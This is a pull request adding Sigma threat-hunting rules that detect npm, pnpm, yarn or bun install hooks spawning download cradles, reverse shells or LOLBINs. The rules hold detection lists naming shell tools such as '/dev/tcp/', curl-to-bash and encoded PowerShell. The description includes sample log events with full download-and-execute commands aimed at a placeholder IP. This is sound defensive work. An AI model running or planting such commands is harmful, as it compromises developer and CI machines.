### PR TITLE
new: Node.js Package Manager Supply-Chain Execution Hunts (Windows/Linux/macOS)

### DIFF
--- a/rules-threat-hunting/linux/process_creation/proc_creation_lnx_nodejs_pkg_manager_susp_child.yml
+++ b/rules-threat-hunting/linux/process_creation/proc_creation_lnx_nodejs_pkg_manager_susp_child.yml
@@ -1,0 +1,67 @@
+title: Node.js Package Manager Spawning Download Or Reverse Shell - Linux
+id: 555bb260-53f8-45b5-a693-76b9c77a712a
+status: experimental
+description: |
+    Detects a Node.js runtime or JavaScript package manager (node / bun, the executors behind npm, pnpm and yarn) spawning a shell that downloads-and-executes payloads or opens a reverse shell, or invoking a scripting interpreter with a network download cradle.
+    This behaviour is characteristic of install-time "lifecycle hook" (preinstall/postinstall) abuse used in modern npm supply-chain compromises (e.g. Shai-Hulud, the @tanstack "Mini Shai-Hulud" and the axios "plain-crypto-js" campaigns), which increasingly target Linux developer workstations and CI runners.
+    Unlike campaign-specific indicator rules, this is a generic behavioural hunt intended to surface the next compromise before its IOCs are published.
+references:
+    - https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
+    - https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package
+    - https://docs.npmjs.com/cli/v10/using-npm/scripts
+author: Nicolò Thei, NikoCosmico01
+date: 2026-07-12
+tags:
+    - attack.execution
+    - attack.t1059.004
+    - attack.t1059.006
+    - attack.t1059.007
+    - attack.t1195.002
+    - detection.threat-hunting
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection_shell:
+        ParentImage|endswith:
+            - '/node'
+            - '/bun'
+        Image|endswith:
+            - '/bash'
+            - '/dash'
+            - '/ksh'
+            - '/sh'
+            - '/zsh'
+        CommandLine|contains:
+            - 'base64 -d'
+            - 'base64 --decode'
+            - 'chmod +x'
+            - 'curl '
+            - '/dev/tcp/'
+            - 'nohup '
+            - '| bash'
+            - '|bash'
+            - '| sh'
+            - '|sh'
+            - 'wget '
+    selection_interpreter:
+        ParentImage|endswith:
+            - '/node'
+            - '/bun'
+        Image|endswith:
+            - '/perl'
+            - '/php'
+            - '/python'
+            - '/python3'
+            - '/ruby'
+        CommandLine|contains:
+            - 'b64decode'
+            - 'base64'
+            - '/dev/tcp/'
+            - 'socket'
+            - 'urllib'
+    condition: 1 of selection_*
+falsepositives:
+    - Legitimate "preinstall"/"postinstall" scripts that fetch prebuilt native binaries via curl/wget. Baseline per project and allowlist known-good packages.
+    - Build tooling that invokes Python/Perl/Ruby for setup tasks.
+level: medium

--- a/rules-threat-hunting/macos/process_creation/proc_creation_macos_nodejs_pkg_manager_susp_child.yml
+++ b/rules-threat-hunting/macos/process_creation/proc_creation_macos_nodejs_pkg_manager_susp_child.yml
@@ -1,0 +1,68 @@
+title: Node.js Package Manager Spawning Download Or Reverse Shell - macOS
+id: c210982b-6001-4f1f-96ad-70fef301e066
+status: experimental
+description: |
+    Detects a Node.js runtime or JavaScript package manager (node / bun, the executors behind npm, pnpm and yarn) spawning a shell that downloads-and-executes payloads or opens a reverse shell, or invoking a scripting interpreter with a network download cradle.
+    This behaviour is characteristic of install-time "lifecycle hook" (preinstall/postinstall) abuse used in modern npm supply-chain compromises (e.g. Shai-Hulud, the @tanstack "Mini Shai-Hulud" and the axios "plain-crypto-js" campaigns), which also target macOS developer workstations.
+    Unlike campaign-specific indicator rules, this is a generic behavioural hunt intended to surface the next compromise before its IOCs are published.
+references:
+    - https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
+    - https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package
+    - https://docs.npmjs.com/cli/v10/using-npm/scripts
+author: Nicolò Thei, NikoCosmico01
+date: 2026-07-12
+tags:
+    - attack.execution
+    - attack.t1059.004
+    - attack.t1059.006
+    - attack.t1059.007
+    - attack.t1195.002
+    - detection.threat-hunting
+logsource:
+    category: process_creation
+    product: macos
+detection:
+    selection_shell:
+        ParentImage|endswith:
+            - '/node'
+            - '/bun'
+        Image|endswith:
+            - '/bash'
+            - '/dash'
+            - '/ksh'
+            - '/sh'
+            - '/zsh'
+        CommandLine|contains:
+            - 'base64 -D'
+            - 'base64 -d'
+            - 'chmod +x'
+            - 'curl '
+            - '/dev/tcp/'
+            - 'nohup '
+            - '| bash'
+            - '|bash'
+            - '| sh'
+            - '|sh'
+            - 'osascript'
+            - 'wget '
+    selection_interpreter:
+        ParentImage|endswith:
+            - '/node'
+            - '/bun'
+        Image|endswith:
+            - '/perl'
+            - '/php'
+            - '/python'
+            - '/python3'
+            - '/ruby'
+        CommandLine|contains:
+            - 'b64decode'
+            - 'base64'
+            - '/dev/tcp/'
+            - 'socket'
+            - 'urllib'
+    condition: 1 of selection_*
+falsepositives:
+    - Legitimate "preinstall"/"postinstall" scripts that fetch prebuilt native binaries via curl/wget. Baseline per project and allowlist known-good packages.
+    - Build tooling that invokes Python/Perl/Ruby for setup tasks.
+level: medium

--- a/rules-threat-hunting/windows/process_creation/proc_creation_win_nodejs_pkg_manager_lolbin_execution.yml
+++ b/rules-threat-hunting/windows/process_creation/proc_creation_win_nodejs_pkg_manager_lolbin_execution.yml
@@ -1,0 +1,61 @@
+title: LOLBIN Or Encoded PowerShell Spawned By Node.js Package Manager
+id: 166bdb44-b051-46ef-8fe2-d9c9d18361c8
+status: experimental
+description: |
+    Detects a Node.js runtime or JavaScript package manager (node.exe / bun.exe, the executors behind npm, pnpm and yarn) spawning a download/execution LOLBIN or an obfuscated PowerShell command, either directly or through a "cmd /c" lifecycle-script shell.
+    This behaviour is characteristic of install-time "lifecycle hook" (preinstall/postinstall) abuse used in modern npm supply-chain compromises (e.g. Shai-Hulud, the @tanstack "Mini Shai-Hulud" and the axios "plain-crypto-js" campaigns), where a trojanised dependency executes attacker code the moment it is installed on a developer or CI host.
+    Unlike campaign-specific indicator rules, this is a generic behavioural hunt intended to surface the next compromise before its IOCs are published.
+references:
+    - https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
+    - https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package
+    - https://docs.npmjs.com/cli/v10/using-npm/scripts
+author: Nicolò Thei, NikoCosmico01
+date: 2026-07-12
+tags:
+    - attack.execution
+    - attack.t1059.001
+    - attack.t1059.007
+    - attack.t1195.002
+    - detection.threat-hunting
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection_lolbin_direct:
+        ParentImage|endswith:
+            - '\node.exe'
+            - '\bun.exe'
+        Image|endswith:
+            - '\bitsadmin.exe'
+            - '\certutil.exe'
+            - '\cscript.exe'
+            - '\mshta.exe'
+            - '\regsvr32.exe'
+            - '\wscript.exe'
+    selection_shell_payload:
+        ParentImage|endswith:
+            - '\node.exe'
+            - '\bun.exe'
+        Image|endswith:
+            - '\cmd.exe'
+            - '\powershell.exe'
+            - '\pwsh.exe'
+        CommandLine|contains:
+            - 'bitsadmin'
+            - 'certutil'
+            - 'DownloadFile'
+            - 'DownloadString'
+            - 'FromBase64String'
+            - 'Invoke-WebRequest'
+            - 'iwr '
+            - 'mshta'
+            - 'regsvr32'
+            - 'Start-BitsTransfer'
+            - ' -enc'
+            - ' -windowstyle hidden'
+            - ' -w hidden'
+    condition: 1 of selection_*
+falsepositives:
+    - Legitimate package "preinstall"/"postinstall" scripts that fetch prebuilt native binaries or invoke the Windows Script Host (some node-gyp / prebuild-install flows). Baseline per project and allowlist known-good packages.
+    - Developer or CI setup tooling that intentionally shells out to PowerShell for provisioning tasks.
+level: medium


### PR DESCRIPTION
### Summary of the Pull Request

Adds three behavioural threat-hunting rules that detect a JavaScript package manager (node.exe / bun.exe, behind npm, pnpm and yarn) spawning a download/execution LOLBIN, an obfuscated PowerShell command, or a shell/interpreter download cradle during install-time lifecycle hooks (preinstall/postinstall).

This is the generic on-host behaviour behind modern npm supply-chain compromises (Shai-Hulud, the @tanstack "Mini Shai-Hulud", the axios "plain-crypto-js" campaign). Unlike the existing campaign-specific indicator rules, these hunts are IOC-agnostic and aim to surface the next compromise before its indicators are published. Windows, Linux and macOS variants are included, all as `threat-hunting` rules (level: medium).

### Changelog

<!--
** Don't remove this comment **
You need to add one line for every changed file of the PR and prefix one of the following tags:
new:	<title>
update:	<title> - <optional comment>
fix:	<title> - <optional comment>
remove:	<title> - <optional comment>
chore: for non-detection related changes (e.g. dates/titles) and changes on workflow
-->

new: LOLBIN Or Encoded PowerShell Spawned By Node.js Package Manager
new: Node.js Package Manager Spawning Download Or Reverse Shell - Linux
new: Node.js Package Manager Spawning Download Or Reverse Shell - macOS

### Example Log Event

Events reproduced in a lab (Sysmon EventID 1). Host/IP are placeholders. Each event is annotated with the selection it triggers.

**Windows — npm `postinstall` carving a payload via certutil** (triggers `selection_shell_payload`)
```
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /d /s /c "certutil -urlcache -split -f http://203.0.113.20/a.b64 %TEMP%\a.b64 & certutil -decode %TEMP%\a.b64 %TEMP%\a.exe & %TEMP%\a.exe"
ParentImage: C:\Program Files\nodejs\node.exe
ParentCommandLine: "C:\Program Files\nodejs\node.exe" C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js install
User: CORP\dev
IntegrityLevel: Medium
```

**Windows — npm lifecycle hook running an encoded PowerShell downloader** (triggers `selection_shell_payload`)
```
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -w hidden -nop -enc SQBFAFgAKABJAHcAcgAgAGgAdAB0AHAAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgAyADAALwBzAC4AcABzADEAKQA=
ParentImage: C:\Program Files\nodejs\node.exe
ParentCommandLine: "C:\Program Files\nodejs\node.exe" C:\Program Files\nodejs\node_modules\pnpm\bin\pnpm.cjs install
User: CORP\dev
IntegrityLevel: Medium
```

**Linux — npm `postinstall` piping curl to a shell** (triggers `selection_shell`)
```
Image: /bin/sh
CommandLine: sh -c "curl -fsSL http://203.0.113.20/s.sh | bash"
ParentImage: /usr/bin/node
ParentCommandLine: node /usr/lib/node_modules/npm/bin/npm-cli.js install
User: ciuser
```

**Linux — npm hook launching a Python download cradle** (triggers `selection_interpreter`)
```
Image: /usr/bin/python3
CommandLine: python3 -c "import urllib.request,base64,os;exec(base64.b64decode(urllib.request.urlopen('http://203.0.113.20/p').read()))"
ParentImage: /usr/bin/node
ParentCommandLine: node /usr/lib/node_modules/npm/bin/npm-cli.js install
User: ciuser
```

### Fixed Issues

N/A

### SigmaHQ Rule Creation Conventions

- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/)